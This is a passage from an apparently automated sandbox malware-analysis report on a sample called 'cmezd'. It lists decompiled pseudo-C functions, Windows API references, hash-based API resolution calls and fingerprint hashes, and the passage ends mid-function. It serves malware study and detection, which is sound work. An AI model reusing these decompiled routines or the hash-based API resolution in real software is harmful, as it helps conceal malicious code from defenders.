                                                                                              0x0041e96b

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00418CB9,?,00419460,00419460,?,00418CB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8F0
                                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E96B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateExitHeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 1054155344-0
                                                                                              • Opcode ID: d9de683a8bfab9e82bb086d4083715190b7a9b1252d4d09981e748e756a53aaf
                                                                                              • Instruction ID: cf9cc797f96d59935dff7869ae2ce17e4b40744dbe2bb0b75c86a5cc178cc62b
                                                                                              • Opcode Fuzzy Hash: d9de683a8bfab9e82bb086d4083715190b7a9b1252d4d09981e748e756a53aaf
                                                                                              • Instruction Fuzzy Hash: 5EF024B8A041006BC710DBA4CC85ED33BA8EF85204F144499BC980B202C179E91583F1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004098A3 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 84%
                                                                                              			E004098A3(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00420213( &_v67, 0, 0x3f);
				E00420CC3( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CF23(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E00419603(_a4 + 0x20, _t13, 0, 0, E00402E13(0x2ef2527b));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C5F3(1, 8, _t19 + 0x540) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}











                                                                                              0x004098a3
                                                                                              0x004098b4
                                                                                              0x004098b8
                                                                                              0x004098c3
                                                                                              0x004098c8
                                                                                              0x004098d3
                                                                                              0x004098eb
                                                                                              0x004098f0
                                                                                              0x004098f7
                                                                                              0x004098f9
                                                                                              0x00409906
                                                                                              0x0040990a
                                                                                              0x00000000
                                                                                              0x0040992e
                                                                                              0x0040990a
                                                                                              0x00409936

                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(000072B1,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409906
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID:
                                                                                              • API String ID: 1836367815-0
                                                                                              • Opcode ID: 8c8e9f467bb6879c5a8c78f1d0dc2f5625c34b38545da03a8c9cbc3b65211247
                                                                                              • Instruction ID: 8f2db9fe8dd4293e769d4f79dd02f83159bb7ad0b88680d8187a7f3a5710d2c7
                                                                                              • Opcode Fuzzy Hash: 8c8e9f467bb6879c5a8c78f1d0dc2f5625c34b38545da03a8c9cbc3b65211247
                                                                                              • Instruction Fuzzy Hash: 6C019B71A4022876E720A695DC82FEF775C9B45B54F14012DFB047A2C2D6A8AD0647F9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E8F5 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 229 41e8f5-41e901 230 41e930-41e934 RtlFreeHeap 229->230 231 41e903-41e91a call 41f243 229->231 233 41e91f-41e92f 231->233 233->230
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,07110A7A,00000000,?), ref: 0041E930
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: 55a0592ddd3e87e94e10c422cadf91ba0204797f2d40f8ce93b3a82e1634df7f
                                                                                              • Instruction ID: 1f4064dec4080926383eea4deb29f94a4842a973331a5e3ad2f339e89f1cfb14
                                                                                              • Opcode Fuzzy Hash: 55a0592ddd3e87e94e10c422cadf91ba0204797f2d40f8ce93b3a82e1634df7f
                                                                                              • Instruction Fuzzy Hash: A9F085B5210208ABCB18EF89CC48EA777A8EF88310F004959F90967252C634FA05CAA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E8C3 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 239 41e8c3-41e8f4 call 41f243 RtlAllocateHeap
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E8C3(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                              0x0041e8d2
                                                                                              0x0041e8da
                                                                                              0x0041e8f0
                                                                                              0x0041e8f4

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00418CB9,?,00419460,00419460,?,00418CB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                                                              • Instruction ID: 54a437fc11085ca12ae2a9f31c46b1b25ee2b1612e845e8a2c08afeac8ca904d
                                                                                              • Opcode Fuzzy Hash: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                                                              • Instruction Fuzzy Hash: 67E046B6600208ABCB14EF89DC45EE737ACEF88764F018059FE085B242C670F914CAF1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004100A3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 234 4100a3-4100bc 235 4100c2-4100c7 234->235 236 4100bd call 419603 234->236 237 4100c9-4100ca 235->237 238 4100cb-4100dc GetUserGeoID 235->238 236->235
                                                                                              C-Code - Quality: 37%
                                                                                              			E004100A3(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00419603(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                                                              0x004100bd
                                                                                              0x004100c7
                                                                                              0x004100cd
                                                                                              0x004100dc
                                                                                              0x004100ca
                                                                                              0x004100ca
                                                                                              0x004100ca

                                                                                              APIs
                                                                                              • GetUserGeoID.KERNELBASE(00000010), ref: 004100CD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: User
                                                                                              • String ID:
                                                                                              • API String ID: 765557111-0
                                                                                              • Opcode ID: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                                                              • Instruction ID: c28064bcec0e87ed17199b1c401a6025e046bcfeae29810ee43e910d84b218be
                                                                                              • Opcode Fuzzy Hash: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                                                              • Instruction Fuzzy Hash: AAE0C27368030426F72091A59C86FA6364E5B84B00F088475F90CD72C2D598E8C01024
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E903 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,07110A7A,00000000,?), ref: 0041E930
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                                                              • Instruction ID: 7d567fb0b9b374d2fcadea76b5f186a9fefaaa7f04dd58c50085a667477643af
                                                                                              • Opcode Fuzzy Hash: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                                                              • Instruction Fuzzy Hash: E8E012B5600208ABCB14EF89DC49EA737ACAF88754F018059BA095B282C670E914CAB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041EA63 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041EA63(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F243( *((intOrPtr*)(_a4 + 0x2f8)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x2f8)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                              0x0041ea7d
                                                                                              0x0041ea93
                                                                                              0x0041ea97

                                                                                              APIs
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEF5,0040FEF5,?,00000000,?,?), ref: 0041EA93
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LookupPrivilegeValue
                                                                                              • String ID:
                                                                                              • API String ID: 3899507212-0
                                                                                              • Opcode ID: b9bac6194bc143243254909c43a71d5c07130939405321bbf8bc0adf5f3a6230
                                                                                              • Instruction ID: 441ee85fda3589afd26e41ae61f19a3667434cbc207aca3ddcc64c5dc7615bd2
                                                                                              • Opcode Fuzzy Hash: b9bac6194bc143243254909c43a71d5c07130939405321bbf8bc0adf5f3a6230
                                                                                              • Instruction Fuzzy Hash: 13E01AB56002046BC710DF89CC45EE777ADAF88654F014165BA0857242C675E9548AB5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 01351260 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 317memoryfileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 75%
                                                                                              			E01351260(signed char __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				int _v528;
				char _v544;
				char _v554;
				long _v560;
				int _v564;
				int _v568;
				intOrPtr _v572;
				void* _t113;
				long _t115;
				void* _t118;
				int _t120;
				signed int _t124;
				unsigned int _t127;
				WCHAR* _t128;
				signed int _t144;
				int _t148;
				short* _t150;
				long _t156;
				struct _SYSTEMTIME* _t158;
				signed int _t164;
				void* _t165;
				int _t166;
				signed char _t170;
				unsigned int _t171;
				void* _t172;
				WCHAR* _t173;
				long _t174;
				int _t175;
				void* _t177;
				int _t179;
				signed int _t180;
				void* _t181;

				_t170 = __edx;
				_t113 = E01351070();
				if(_t113 == 0) {
					L66:
					return _t113;
				}
				asm("movdqa xmm0, [0x1394120]");
				asm("movdqu [esp+0x4], xmm0");
				 *((intOrPtr*)(_t181 - 0x1c)) = _a4;
				_v568 = 0;
				_v572 = 0x80;
				_t113 = CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if(_t113 == 0xffffffff) {
					goto L66;
				}
				_t172 = _t113;
				_t115 = GetFileSize(_t113, 0);
				if(_t115 == 0xffffffff) {
					L9:
					return CloseHandle(_t172);
				}
				_t156 = _t115;
				_t4 = _t115 + 2; // 0x2
				_t118 = HeapAlloc(GetProcessHeap(), 0, _t4);
				if(_t118 == 0) {
					goto L9;
				}
				_t177 = _t118;
				_t120 = ReadFile(_t172, _t177, _t156,  &_v560, 0);
				CloseHandle(_t172);
				if(_t120 == 0) {
					L56:
					return HeapFree(GetProcessHeap(), 0, _t177);
				}
				_t124 = _a8;
				_t179 = _v560;
				if(_t124 == 0xffffffff) {
					if(_t179 < 3 || ( *(_t177 + 2) & 0x000000ff ^ 0x000000bf |  *_t177 & 0x0000ffff ^ 0x0000bbef) != 0) {
						_v528 = 0x288;
						IsTextUnicode(_t177, _t179,  &_v528);
						_t127 = _v528;
						if((_t127 & 0x00000008) != 0) {
							L15:
							_t180 = _t179 >> 1;
							if(_t180 <= 0) {
								goto L55;
							}
							goto L16;
						}
						_t124 = _t127 >> 0x00000006 & 0x00000002;
						_t15 = _t124 - 1; // 0x287
						_t165 = _t15;
						L14:
						if(_t165 > 1) {
							_t166 = 0;
							if(_t124 != 3) {
								goto L53;
							}
							goto L52;
						}
						goto L15;
					} else {
						L52:
						_t166 = 0xfde9;
						L53:
						_v564 = _t166;
						_t148 = MultiByteToWideChar(_t166, 0, _t177, _t179, 0, 0);
						_t175 = _t148;
						_t150 = HeapAlloc(GetProcessHeap(), 0, _t148 + _t148 + 2);
						if(_t150 == 0) {
							goto L56;
						}
						MultiByteToWideChar(_v564, 0, _t177, _t179, _t150, _t175);
						HeapFree(GetProcessHeap(), 0, _t177);
						_t180 = _t175;
						_t177 = _t150;
						if(_t180 > 0) {
							L16:
							_t144 = 0;
							if(_t180 < 0x10) {
								L58:
								if( *((short*)(_t177 + _t144 * 2)) == 0) {
									 *((short*)(_t177 + _t144 * 2)) = 0x20;
								}
								_t144 = _t144 + 1;
								L57:
								if(_t180 == _t144) {
									 *((short*)(_t177 + _t180 * 2)) = 0;
									_t128 = _t177;
									if(_t180 > 0) {
										_t128 = _t177 + (0 | ( *_t177 & 0x0000ffff) == 0x0000feff) * 2;
									}
									L63:
									SetWindowTextW( *0x139ebd8, _t128);
									HeapFree(GetProcessHeap(), 0, _t177);
									SendMessageW( *0x139ebd8, 0xb9, 0, 0);
									SendMessageW( *0x139ebd8, 0xcd, 0, 0);
									SetFocus( *0x139ebd8);
									_t173 =  &_v554;
									_t113 = GetWindowTextW( *0x139ebd8, _t173, 0);
									if(_t113 == 0) {
										goto L66;
									}
									_t113 = lstrcmpW(_t173, L".LOG");
									if(_t113 != 0) {
										goto L66;
									}
									SendMessageW( *0x139ebd8, 0xb1, GetWindowTextLengthW( *0x139ebd8), 0xffffffff);
									SendMessageW( *0x139ebd8, 0xc2, 1, L"\r\n");
									_t158 =  &_v544;
									GetLocalTime(_t158);
									_t174 =  &_v528;
									GetTimeFormatW(0x400, 2, _t158, 0, _t174, 0xff);
									SendMessageW( *0x139ebd8, 0xc2, 1, _t174);
									SendMessageW( *0x139ebd8, 0xc2, 1, " ");
									GetDateFormatW(0x400, 0, _t158, 0, _t174, 0xff);
									SendMessageW( *0x139ebd8, 0xc2, 1, _t174);
									return SendMessageW( *0x139ebd8, 0xc2, 1, L"\r\n");
								}
								goto L58;
							}
							_t144 = _t180 & 0xfffffff0;
							_t164 = 0;
							asm("pxor xmm0, xmm0");
							do {
								asm("movdqu xmm1, [esi+ecx*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("movd edx, xmm1");
								if((_t170 & 0x00000001) != 0) {
									 *((short*)(_t177 + _t164 * 2)) = 0x20;
								}
								_t171 = _t170 >> 0x10;
								if((_t171 & 0x00000001) != 0) {
									 *((short*)(_t177 + 2 + _t164 * 2)) = 0x20;
								}
								asm("pextrw edx, xmm1, 0x2");
								if((_t171 & 0x00000001) != 0) {
									 *((short*)(_t177 + 4 + _t164 * 2)) = 0x20;
								}
								asm("pextrw edx, xmm1, 0x3");
								if((_t171 & 0x00000001) != 0) {
									 *((short*)(_t177 + 6 + _t164 * 2)) = 0x20;
								}
								asm("pextrw edx, xmm1, 0x4");
								if((_t171 & 0x00000001) != 0) {
									 *((short*)(_t177 + 8 + _t164 * 2)) = 0x20;
								}
								asm("pextrw edx, xmm1, 0x5");
								if((_t171 & 0x00000001) != 0) {
									 *((short*)(_t177 + 0xa + _t164 * 2)) = 0x20;
								}
								asm("pextrw edx, xmm1, 0x6");
								if((_t171 & 0x00000001) != 0) {
									 *((short*)(_t177 + 0xc + _t164 * 2)) = 0x20;
								}
								asm("pextrw edx, xmm1, 0x7");
								if((_t171 & 0x00000001) != 0) {
									 *((short*)(_t177 + 0xe + _t164 * 2)) = 0x20;
								}
								asm("movdqu xmm1, [esi+ecx*2+0x10]");
								asm("pcmpeqw xmm1, xmm0");
								asm("movd edx, xmm1");
								if((_t171 & 0x00000001) != 0) {
									 *((short*)(_t177 + 0x10 + _t164 * 2)) = 0x20;
								}
								_t170 = _t171 >> 0x10;
								if((_t170 & 0x00000001) != 0) {
									 *((short*)(_t177 + 0x12 + _t164 * 2)) = 0x20;
								}
								asm("pextrw edx, xmm1, 0x2");
								if((_t170 & 0x00000001) != 0) {
									 *((short*)(_t177 + 0x14 + _t164 * 2)) = 0x20;
								}
								asm("pextrw edx, xmm1, 0x3");
								if((_t170 & 0x00000001) != 0) {
									 *((short*)(_t177 + 0x16 + _t164 * 2)) = 0x20;
								}
								asm("pextrw edx, xmm1, 0x4");
								if((_t170 & 0x00000001) != 0) {
									 *((short*)(_t177 + 0x18 + _t164 * 2)) = 0x20;
								}
								asm("pextrw edx, xmm1, 0x5");
								if((_t170 & 0x00000001) != 0) {
									 *((short*)(_t177 + 0x1a + _t164 * 2)) = 0x20;
								}
								asm("pextrw edx, xmm1, 0x6");
								if((_t170 & 0x00000001) != 0) {
									 *((short*)(_t177 + 0x1c + _t164 * 2)) = 0x20;
								}
								asm("pextrw edx, xmm1, 0x7");
								if((_t170 & 0x00000001) != 0) {
									 *((short*)(_t177 + 0x1e + _t164 * 2)) = 0x20;
								}
								_t164 = _t164 + 0x10;
							} while (_t144 != _t164);
							goto L57;
						}
						L55:
						 *((short*)(_t177 + _t180 * 2)) = 0;
						_t128 = _t177;
						goto L63;
					}
				}
				_t165 = _t124 - 1;
				if(_t165 > 1) {
					goto L14;
				}
				if(_t179 > 1) {
					goto L15;
				}
				goto L14;
			}



































                                                                                              0x01351260
                                                                                              0x0135126a
                                                                                              0x01351271
                                                                                              0x013516c7
                                                                                              0x013516c7
                                                                                              0x013516c7
                                                                                              0x01351281
                                                                                              0x01351289
                                                                                              0x0135128f
                                                                                              0x01351292
                                                                                              0x0135129a
                                                                                              0x013512a2
                                                                                              0x013512ab
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013512b1
                                                                                              0x013512b6
                                                                                              0x013512bf
                                                                                              0x0135131c
                                                                                              0x00000000
                                                                                              0x0135131d
                                                                                              0x013512c1
                                                                                              0x013512c3
                                                                                              0x013512d0
                                                                                              0x013512d8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013512da
                                                                                              0x013512e6
                                                                                              0x013512ef
                                                                                              0x013512f7
                                                                                              0x01351543
                                                                                              0x00000000
                                                                                              0x0135154d
                                                                                              0x013512fd
                                                                                              0x01351304
                                                                                              0x0135130b
                                                                                              0x0135132b
                                                                                              0x01351348
                                                                                              0x01351357
                                                                                              0x0135135d
                                                                                              0x01351363
                                                                                              0x01351377
                                                                                              0x01351377
                                                                                              0x0135137b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135137b
                                                                                              0x01351368
                                                                                              0x0135136b
                                                                                              0x0135136b
                                                                                              0x0135136e
                                                                                              0x01351371
                                                                                              0x013514d0
                                                                                              0x013514d5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013514d5
                                                                                              0x00000000
                                                                                              0x013514d7
                                                                                              0x013514d7
                                                                                              0x013514d7
                                                                                              0x013514dc
                                                                                              0x013514e4
                                                                                              0x013514e9
                                                                                              0x013514ef
                                                                                              0x01351501
                                                                                              0x01351509
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01351517
                                                                                              0x01351527
                                                                                              0x0135152d
                                                                                              0x0135152f
                                                                                              0x01351533
                                                                                              0x01351381
                                                                                              0x01351381
                                                                                              0x01351386
                                                                                              0x0135155c
                                                                                              0x01351561
                                                                                              0x01351563
                                                                                              0x01351563
                                                                                              0x01351569
                                                                                              0x01351558
                                                                                              0x0135155a
                                                                                              0x0135156e
                                                                                              0x01351574
                                                                                              0x01351578
                                                                                              0x01351587
                                                                                              0x01351587
                                                                                              0x0135158a
                                                                                              0x01351591
                                                                                              0x013515a1
                                                                                              0x013515bc
                                                                                              0x013515cd
                                                                                              0x013515d5
                                                                                              0x013515db
                                                                                              0x013515e8
                                                                                              0x013515f0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013515fc
                                                                                              0x01351604
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01351624
                                                                                              0x01351638
                                                                                              0x0135163a
                                                                                              0x0135163f
                                                                                              0x01351645
                                                                                              0x01351659
                                                                                              0x0135166d
                                                                                              0x01351681
                                                                                              0x01351693
                                                                                              0x013516a7
                                                                                              0x00000000
                                                                                              0x013516bb
                                                                                              0x00000000
                                                                                              0x0135155a
                                                                                              0x0135138e
                                                                                              0x01351391
                                                                                              0x01351393
                                                                                              0x013513ab
                                                                                              0x013513ab
                                                                                              0x013513b0
                                                                                              0x013513b4
                                                                                              0x013513bb
                                                                                              0x013513bd
                                                                                              0x013513bd
                                                                                              0x013513c3
                                                                                              0x013513c9
                                                                                              0x013513cb
                                                                                              0x013513cb
                                                                                              0x013513d2
                                                                                              0x013513da
                                                                                              0x013513dc
                                                                                              0x013513dc
                                                                                              0x013513e3
                                                                                              0x013513eb
                                                                                              0x013513ed
                                                                                              0x013513ed
                                                                                              0x013513f4
                                                                                              0x013513fc
                                                                                              0x013513fe
                                                                                              0x013513fe
                                                                                              0x01351405
                                                                                              0x0135140d
                                                                                              0x0135140f
                                                                                              0x0135140f
                                                                                              0x01351416
                                                                                              0x0135141e
                                                                                              0x01351420
                                                                                              0x01351420
                                                                                              0x01351427
                                                                                              0x0135142f
                                                                                              0x01351431
                                                                                              0x01351431
                                                                                              0x01351438
                                                                                              0x0135143e
                                                                                              0x01351442
                                                                                              0x01351449
                                                                                              0x0135144b
                                                                                              0x0135144b
                                                                                              0x01351452
                                                                                              0x01351458
                                                                                              0x0135145a
                                                                                              0x0135145a
                                                                                              0x01351461
                                                                                              0x01351469
                                                                                              0x0135146b
                                                                                              0x0135146b
                                                                                              0x01351472
                                                                                              0x0135147a
                                                                                              0x0135147c
                                                                                              0x0135147c
                                                                                              0x01351483
                                                                                              0x0135148b
                                                                                              0x0135148d
                                                                                              0x0135148d
                                                                                              0x01351494
                                                                                              0x0135149c
                                                                                              0x0135149e
                                                                                              0x0135149e
                                                                                              0x013514a5
                                                                                              0x013514ad
                                                                                              0x013514af
                                                                                              0x013514af
                                                                                              0x013514b6
                                                                                              0x013514be
                                                                                              0x013514c4
                                                                                              0x013514c4
                                                                                              0x013513a0
                                                                                              0x013513a3
                                                                                              0x00000000
                                                                                              0x013513ab
                                                                                              0x01351539
                                                                                              0x01351539
                                                                                              0x0135153f
                                                                                              0x00000000
                                                                                              0x0135153f
                                                                                              0x0135132b
                                                                                              0x0135130d
                                                                                              0x01351313
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01351318
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 01351070: GetWindowTextLengthW.USER32 ref: 0135107D
                                                                                                • Part of subcall function 01351070: SendMessageW.USER32(000000B8,00000000,00000000), ref: 01351094
                                                                                                • Part of subcall function 01351070: lstrcpyW.KERNEL32 ref: 013510F0
                                                                                                • Part of subcall function 01351070: GetSaveFileNameW.COMDLG32 ref: 0135115A
                                                                                              • CreateFileW.KERNEL32 ref: 013512A2
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 013512B6
                                                                                              • GetProcessHeap.KERNEL32 ref: 013512C6
                                                                                              • HeapAlloc.KERNEL32(00000000,00000000,00000002), ref: 013512D0
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 013512E6
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 013512EF
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0135131D
                                                                                              • IsTextUnicode.ADVAPI32(00000000,?,00000288), ref: 01351357
                                                                                              • GetProcessHeap.KERNEL32 ref: 01351543
                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0135154D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHeap$CloseHandleProcessText$AllocCreateFreeLengthMessageNameReadSaveSendSizeUnicodeWindowlstrcpy
                                                                                              • String ID: .LOG
                                                                                              • API String ID: 1038303908-2272326732
                                                                                              • Opcode ID: 82a60775c81041debaf03e13c671f6110c8a5e8f0a6cde89d46685582b9647d4
                                                                                              • Instruction ID: 5f7e9498638ba315266d6a88edb0ab91a1697e7b76967c3956d8855fb299e14b
                                                                                              • Opcode Fuzzy Hash: 82a60775c81041debaf03e13c671f6110c8a5e8f0a6cde89d46685582b9647d4
                                                                                              • Instruction Fuzzy Hash: ACB13771244300ABF3714B64DC4AF7B7FA8EF40F48F045618FA42AA1EAD7B69494C762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01352CE0 Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 251windowregistrymemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 87%
                                                                                              			E01352CE0(void* __ecx, void* __edx, struct HINSTANCE__* _a4, int _a8, intOrPtr _a12) {
				struct tagMONITORINFO _v64;
				intOrPtr _v84;
				char _v85;
				char _v86;
				char _v87;
				void* _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				void* _v104;
				char _v105;
				char _v106;
				char _v107;
				void* _v108;
				char _v109;
				char _v110;
				char _v111;
				struct HINSTANCE__* _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				void* __ebx;
				void* __edi;
				struct HINSTANCE__* _t100;
				int _t102;
				struct HMONITOR__* _t107;
				signed int _t133;
				void* _t136;
				long _t137;
				signed int _t140;
				signed int _t144;
				MSG* _t158;
				signed int* _t159;
				int _t161;
				struct HACCEL__* _t162;
				struct HINSTANCE__* _t163;
				signed int _t165;
				void* _t171;
				WNDCLASSEXW* _t172;

				_t163 = _a4;
				_t156 = E01359D3F(_a12, 0x1398560);
				E0135A2C7(_t136, __edx, _t91, _t91, 0, 2);
				_t137 = E0135A80B(_t136, __edx, _t91, _t91);
